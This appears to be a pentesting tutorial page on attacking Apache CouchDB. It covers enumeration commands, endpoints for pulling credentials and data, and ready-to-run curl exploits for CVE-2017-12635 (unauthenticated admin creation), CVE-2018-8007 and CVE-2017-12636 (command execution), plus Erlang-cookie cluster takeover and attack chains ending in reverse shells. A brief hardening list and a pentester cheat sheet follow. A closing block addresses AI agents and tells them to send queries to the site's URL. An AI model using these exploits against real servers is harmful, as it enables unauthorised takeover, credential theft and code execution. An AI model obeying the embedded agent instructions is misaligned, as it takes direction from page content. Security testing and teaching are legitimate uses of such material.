# CouchDB - Port 5984,6984 {% tabs %} {% tab title="Support VeryLazyTech πŸŽ‰" %} * Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://whop.com/verylazytech/)for e-books and courses. πŸ“š {% endtab %} {% endtabs %} ### Basic info CouchDB is **A document-oriented, schema-less NoSQL database where every β€œdocument” is just JSON.** Internally, CouchDB stores: | Field | Meaning | | ------ | -------------------------------- | | `_id` | The document’s unique identifier | | `_rev` | Revision number (tracks changes) | Documents can contain key-value mappings, nested maps, or lists.\ Everything is accessed through **HTTP REST APIs** β€” not drivers. #### Default Ports | Port | Protocol | Purpose | | -------- | -------- | -------------------------------------------------------------- | | **5984** | HTTP | Public API | | **6984** | HTTPS | Public API | | **5986** | Internal | Node-local API | | **4369** | TCP | Erlang Port Mapper Daemon (EPMD) β€” extremely important for RCE | And if you see **port 4369 (EPMD)** β†’ your hacker senses should start tingling. (More on that later.) *** ## **Automatic Enumeration** #### Nmap ```bash nmap -sV --script couchdb-databases,couchdb-stats -p 5984 ``` #### Metasploit ```bash msf> use auxiliary/scanner/couchdb/couchdb_enum ``` *** ## **Manual Enumeration (Must-Know for Real Pentesters)** #### Check if CouchDB is reachable ```bash curl http://:5984/ ``` Possible outputs: **Unauthenticated access allowed:** ```json {"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}} ``` **Authentication required:** ```json {"error":"unauthorized","reason":"Authentication required."} ``` If you see **401**, you’ll need creds or an exploit. *** ## **High-Value Endpoints Hackers Should Always Check** These endpoints typically reveal **database names**, **cluster metadata**, and **replication details** β€” sometimes containing **API keys**, **JWT secrets**, **production credentials**, or **remote cluster URLs**. | Endpoint | What It Reveals | | ---------------------- | -------------------------------------------- | | `/_active_tasks` | Replication, indexing jobs, DB names | | `/_all_dbs` | **All database names** (usually the jackpot) | | `/_cluster_setup` | Cluster configuration | | `/_db_updates` | Real-time database creation events | | `/_membership` | Cluster nodes | | `/_scheduler/jobs` | Replication dag + credentials | | `/_node/_local/_stats` | System info | | `/_up` | Basic health check | | `/_uuids` | UUID generation | | `/_reshard` | Shard operations | Use: ```bash curl http://:5984/_all_dbs ``` If 401: ```bash curl http://user:pass@:5984/_all_dbs ``` *** ## **Extracting Databases, Documents & Credentials** #### List databases ```bash curl http://:5984/_all_dbs ``` Example: ```json ["_global_changes","_metadata","_replicator","_users","passwords","simpsons"] ``` #### Show DB metadata ```bash curl http://:5984/ ``` #### List documents ```bash curl http://:5984//_all_docs ``` #### Read a document ```bash curl http://:5984// ``` At this point, in real pentests, you often find: βœ” API keys\ βœ” Auth tokens\ βœ” Password databases\ βœ” Backups\ βœ” Internal cluster secrets\ βœ” User PII *** ## **Exploitation Techniques** CouchDB has had **multiple high-impact CVEs**, many still found in the wild. #### **CVE-2017-12635 β€” Create an Admin User Without Authentication** This is the **most famous and most dangerous CouchDB vulnerability ever discovered**. #### 🧠 Why it works CouchDB parses JSON twice β€” once in **Erlang**, once in **JavaScript**. If you send **two fields with the same key**, the Erlang parser keeps both, but the JS parser keeps only the last. Meaning this payload: ```json { "type":"user", "name":"hacktricks", "roles":["_admin"], "roles":[], "password":"hacktricks" } ``` β†’ **Erlang sees roles=\["\_admin"]**\ β†’ **JS sees roles=\[]** CouchDB incorrectly grants admin privileges. #### Exploit: ```bash curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' \ http://:5984/_users/org.couchdb.user:hacktricks \ -H "Content-Type:application/json" ``` You now have **admin control of the entire server**. *** #### **CVE-2018-8007 β€” RCE via local.ini write injection (OS Daemons)** If an attacker can write to `local.ini` (misconfigured perms), they can register system daemons to be executed by CouchDB. Injection example: ```bash curl -X PUT 'http://admin:admin@localhost:5984/_node/couchdb@localhost/_config/cors/origins' \ -d "evil\n\n[os_daemons]\npwn=/usr/bin/touch /tmp/pwned" ``` Then: ``` kill couchdb PID ``` CouchDB restarts β†’ executes `/usr/bin/touch /tmp/pwned`. This is **full OS command execution**. #### **CVE-2017-12636 β€” RCE via malicious query server definitions** CouchDB allows admins to define query servers, e.g.: ```ini [query_servers] python=/usr/bin/python3 ``` But if you can write: ```ini cmd=/bin/sh ``` You can trigger it by creating a view that calls the query server. Example exploitation flow: ```bash curl -X PUT http://admin:pass@host:5984/evil curl -X PUT http://admin:pass@host:5984/evil/payload -d '{"_id":"x"}' curl -X PUT http://admin:pass@host:5984/evil/_design/pwn \ -d '{"views":{"x":{"map":""}},"language":"cmd"}' ``` Boom β†’ command execution. #### **Erlang Cookie RCE (Not a CVE β€” but extremely real)** If port **4369 (EPMD)** is open AND you can read the Erlang cookie file (usually `.erlang.cookie`), you can: βœ” Join the CouchDB cluster\ βœ” Execute arbitrary Erlang code\ βœ” Spawn remote shells\ βœ” Dump secrets\ βœ” Control the entire node This is a **full cluster compromise**. Erlang cookies are commonly found in: ``` /home/couchdb/.erlang.cookie /home//.erlang.cookie ``` If readable β†’ game over. *** ## **Practical Real-World Attack Chains** ### Attack Chain 1: #### **Unauthenticated CouchDB + Exposed \_all\_dbs β†’ Secrets β†’ Lateral Movement** 1. Access `/_all_dbs` 2. Dump `_replicator` DB 3. Replication tasks often include remote credentials 4. Use creds to pivot into AWS, GitLab, MongoDB, etc. *** ### Attack Chain 2: #### **CVE-2017-12635 Admin Creation β†’ Query Server RCE β†’ Reverse Shell** 1. Create admin user (CVE-2017-12635) 2. Add malicious query server 3. Trigger RCE via design document 4. Send reverse shell payload 5. Full system compromise *** ### Attack Chain 3: #### **Misconfigured local.ini β†’ CouchDB Daemon Injection (CVE-2018-8007) β†’ Privilege escalation** 1. Write to `/home/*/etc/local.ini` 2. Inject `[os_daemons]` 3. Restart CouchDB β†’ execute payload 4. Gain local user’s privileges 5. Escalate via sudo misconfig or cron jobs *** ### Attack Chain 4: #### **Erlang Cookie Leakage β†’ Cluster Takeover** 1. Access `.erlang.cookie` (world-readable) 2. Connect to EPMD node 3. Execute arbitrary Erlang commands 4. RCE without touching CouchDB API 5. Persist via erlang shell This is extremely powerful and still commonly found. *** ## **Defending CouchDB (What Blue Teams Must Fix)** βœ” Disable remote access to 5984 unless behind firewall\ βœ” Block port 4369 (EPMD) externally\ βœ” Do NOT allow world-writable `local.ini`\ βœ” Upgrade from vulnerable versions: * 1.x * 2.x pre-2.2\ βœ” Enforce authentication (`require_valid_user = true`)\ βœ” Disable `_session` cookie if not needed\ βœ” Disable CORS unless required\ βœ” Rotate Erlang cookie after compromise\ βœ” Disable default admin/admin accounts *** ## **Cheat Sheet Summary for Pentesters** #### Enumeration ``` curl http://host:5984/ curl http://host:5984/_all_dbs curl http://host:5984//_all_docs curl http://host:5984// ``` #### CVE-2017-12635 Admin Creation ``` curl -X PUT -d '{"type":"user","name":"pwn","roles":["_admin"],"roles":[],"password":"pwn"}' ``` #### CVE-2017-12636 / Query Server RCE ``` curl -X PUT /_config/query_servers/cmd -d '"/bin/sh"' ``` #### CVE-2018-8007 OS Daemon Injection ``` [os_daemons] evil=/bin/sh /tmp/malicious.sh ``` #### Erlang Cookie RCE Look for `.erlang.cookie` + port 4369 open. *** {% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://whop.com/verylazytech/)
Support VeryLazyTech πŸŽ‰ * Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://whop.com/verylazytech/)for e-books and courses. πŸ“š
{% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.verylazytech.com/couchdb-port-5984-6984.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.